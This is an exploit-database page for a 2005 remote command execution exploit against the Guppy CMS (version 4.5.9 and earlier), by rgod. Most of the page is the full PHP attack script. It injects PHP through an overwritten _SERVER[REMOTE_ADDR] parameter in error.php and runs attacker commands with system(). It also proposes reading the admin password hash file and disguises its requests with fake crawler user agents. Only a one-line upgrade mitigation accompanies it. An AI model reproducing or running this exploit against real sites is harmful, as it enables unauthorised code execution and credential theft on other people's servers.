header-logo
Suggest Exploit
vendor:
Guppy
by:
rgod
7.5
CVSS
HIGH
Remote Code Execution
78
CWE
Product Name: Guppy
Affected Version From: 4.5.2009
Affected Version To: 4.5.2009
Patch Exists: YES
Related CWE: N/A
CPE: a:guppy:guppy
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Apache
2005

Guppy <=4.5.9 _SERVER[REMOTE_ADDR] overwrite / remote commands xctn

This exploit allows an attacker to inject arbitrary PHP code into a vulnerable Guppy <=4.5.9 web application. The exploit is launched from an Apache server and requires the attacker to fill in the requested fields. Once the exploit is launched, the attacker can execute remote commands.

Mitigation:

Upgrade to the latest version of Guppy.
Source

Exploit-DB raw data:

<?php
#  if magic_quotes_gpc is off you can inject arbitrary php code (from rgod) /str0ke
#									       #
#   ---guppy459_xpl.php                                   17.30 28/11/2005     #
#                                                                              #
#    Guppy <=4.5.9 _SERVER[REMOTE_ADDR] overwrite / remote commands xctn       #
#                              coded by rgod                                   #
#                    site: http://rgod.altervista.org                          #
#                                                                              #
#  usage: launch from Apache, fill in requested fields, then go!               #
#                                                                              #
#  Sun-Tzu:"To lift an autumn hair is no sign of great strength; to see the    #
#  sun and moon is no sign of sharp sight; to hear the noise of thunder is     #
#  no sign of a quick ear."                                                    #

error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout", 2);
ob_implicit_flush (1);

echo'<html><head><title> ******** Guppy <=4.5.9  remote commands xctn **********
</title><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<style type="text/css"> body {background-color:#111111;   SCROLLBAR-ARROW-COLOR:
#ffffff; SCROLLBAR-BASE-COLOR: black; CURSOR: crosshair; color:  #1CB081; }  img
{background-color:   #FFFFFF   !important}  input  {background-color:    #303030
!important} option {  background-color:   #303030   !important}         textarea
{background-color: #303030 !important} input {color: #1CB081 !important}  option
{color: #1CB081 !important} textarea {color: #1CB081 !important}        checkbox
{background-color: #303030 !important} select {font-weight: normal;       color:
#1CB081;  background-color:  #303030;}  body  {font-size:  8pt       !important;
background-color:   #111111;   body * {font-size: 8pt !important} h1 {font-size:
0.8em !important}   h2   {font-size:   0.8em    !important} h3 {font-size: 0.8em
!important} h4,h5,h6    {font-size: 0.8em !important}  h1 font {font-size: 0.8em
!important} 	h2 font {font-size: 0.8em !important}h3   font {font-size: 0.8em
!important} h4 font,h5 font,h6 font {font-size: 0.8em !important} * {font-style:
normal !important} *{text-decoration: none !important} a:link,a:active,a:visited
{ text-decoration: none ; color : #99aa33; } a:hover{text-decoration: underline;
color : #999933; } .Stile5 {font-family: Verdana, Arial, Helvetica,  sans-serif;
font-size: 10px; } .Stile6 {font-family: Verdana, Arial, Helvetica,  sans-serif;
font-weight:bold; font-style: italic;}--></style></head><body><p class="Stile6">
 ******** Guppy <=4.5.9  remote commands xctn **********</p><p class="Stile6">a
script  by  rgod  at        <a href="http://rgod.altervista.org"target="_blank">
http://rgod.altervista.org</a></p><table width="84%"><tr><td width="43%">  <form
name="form1" method="post"  action="'.strip_tags($SERVER[PHP_SELF]).'"><p><input
type="text"  name="host"> <span class="Stile5">* hostname (ex:www.sitename.com)
</span></p> <p><input type="text" name="path">  <span class="Stile5">* path (ex:
/guppy/  or just / ) </span></p><p><input type="text" name="command">      <span
class="Stile5"> * specify a command , "cat ./admin/mdp.php" to  see       master
database MD5 password hash( against  windows: type .\admin\mdp.php) </span> </p>
<p> <input type="text" name="port"><span class="Stile5">specify  a  port   other
than  80 ( default  value ) </span></p> <p>  <input  type="text"   name="proxy">
<span class="Stile5">  send  exploit through an  HTTP proxy (ip:port)</span></p>
<p><input type="submit" name="Submit" value="go!"></p></form> </td></tr></table>
</body></html>';


function show($headeri)
{
$ii=0;
$ji=0;
$ki=0;
$ci=0;
echo '<table border="0"><tr>';
while ($ii <= strlen($headeri)-1)
{
$datai=dechex(ord($headeri[$ii]));
if ($ji==16) {
             $ji=0;
             $ci++;
             echo "<td>&nbsp;&nbsp;</td>";
             for ($li=0; $li<=15; $li++)
                      { echo "<td>".$headeri[$li+$ki]."</td>";
			    }
            $ki=$ki+16;
            echo "</tr><tr>";
            }
if (strlen($datai)==1) {echo "<td>0".$datai."</td>";} else
{echo "<td>".$datai."</td> ";}
$ii++;
$ji++;
}
for ($li=1; $li<=(16 - (strlen($headeri) % 16)+1); $li++)
                      { echo "<td>&nbsp&nbsp</td>";
                       }

for ($li=$ci*16; $li<=strlen($headeri); $li++)
                      { echo "<td>".$headeri[$li]."</td>";
			    }
echo "</tr></table>";
}
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';

function sendpacket() //if you have sockets module loaded, 2x speed! if not,load
		              //next function to send packets
{
  global $proxy, $host, $port, $packet, $html, $proxy_regex;
  $socket = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
  if ($socket < 0) {
                   echo "socket_create() failed: reason: " . socket_strerror($socket) . "<br>";
                   }
	      else
 		  {   $c = preg_match($proxy_regex,$proxy);
              if (!$c) {echo 'Not a valid prozy...';
                        die;
                       }
                    echo "OK.<br>";
                    echo "Attempting to connect to ".$host." on port ".$port."...<br>";
                    if ($proxy=='')
		   {
		     $result = socket_connect($socket, $host, $port);
		   }
		   else
		   {

		   $parts =explode(':',$proxy);
                   echo 'Connecting to '.$parts[0].':'.$parts[1].' proxy...<br>';
		   $result = socket_connect($socket, $parts[0],$parts[1]);
		   }
		   if ($result < 0) {
                                     echo "socket_connect() failed.\r\nReason: (".$result.") " . socket_strerror($result) . "<br><br>";
                                    }
	                       else
		                    {
                                     echo "OK.<br><br>";
                                     $html= '';
                                     socket_write($socket, $packet, strlen($packet));
                                     echo "Reading response:<br>";
                                     while ($out= socket_read($socket, 2048)) {$html.=$out;}
                                     echo nl2br(htmlentities($html));
                                     echo "Closing socket...";
                                     socket_close($socket);

				    }
                  }
}
function sendpacketii($packet)
{
global $proxy, $host, $port, $html, $proxy_regex;
if ($proxy=='')
      {$ock=fsockopen(gethostbyname($host),$port);
       if (!$ock) { echo 'No response from '.htmlentities($host);
			die; }
      }
             else
           {
	   $c = preg_match($proxy_regex,$proxy);
              if (!$c) {echo 'Not a valid prozy...';
                        die;
                       }
	   $parts=explode(':',$proxy);
	    echo 'Connecting to '.$parts[0].':'.$parts[1].' proxy...<br>';
	    $ock=fsockopen($parts[0],$parts[1]);
	    if (!$ock) { echo 'No response from proxy...';
			die;
		       }
	   }
fputs($ock,$packet);
if ($proxy=='')
  {

    $html='';
    while (!feof($ock))
      {
        $html.=fgets($ock);
      }
  }
else
  {
    $html='';
    while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html)))
    {
      $html.=fread($ock,1);
    }
  }
fclose($ock);
echo nl2br(htmlentities($html));
}
$host=$_POST[host];$path=$_POST[path];
$port=$_POST[port];$command=$_POST[command];
$proxy=$_POST[proxy];

if (($host<>'') and ($path<>'') and ($command<>''))
{
$port=intval(trim($port));
if ($port=='') {$port=80;}
if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}
$host=str_replace("\r\n","",$host);
$path=str_replace("\r\n","",$path);

#STEP 1 -> inject command...
$CODE='";error_reporting(0);ini_set("max_execution_time",0);system("'.$command.'>SUNTZU");echo"';
$CODE=urlencode($CODE);
$packet="GET ".$p."error.php?err=suntzu&_SERVER=&_SERVER[REMOTE_ADDR]=".$CODE." HTTP/1.1\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Accept-Encoding: text/plain\r\n";
$packet.="User-Agent: Googlebot/Test (+http://www.googlebot.com/bot.html)\r\n";
$packet.="Connection: Close\r\n\r\n";
show($packet);
sendpacketii($packet);
#now you will be redirected to an error description page, we need to see this
#url to include/execute error file...
$temp=explode('location: ',$html);
$temp2=explode(chr(0x0d).chr(0x0a),$temp[1]);
$location=$temp2[0];
echo "Location ->".htmlentities($location)."<br>";

#STEP 2 -> Launch commands...
$packet="GET ".$p.$location." HTTP/1.1\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Accept-Encoding: text/plain\r\n";
$packet.="User-Agent: Internet Ninja x.0\r\n";
$packet.="Connection: Close\r\n\r\n";
show($packet);
sendpacketii($packet);

#STEP 3 -> lookin' for redirected output...
$packet="GET ".$p."SUNTZU HTTP/1.1\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Accept-Encoding: text/plain\r\n";
$packet.="User-Agent: Kenjin Spider\r\n";
$packet.="Connection: Close\r\n\r\n";
show($packet);
sendpacketii($packet);
}

?>

# milw0rm.com [2005-11-28]

Navigation

Suggest Exploit

Services By CQR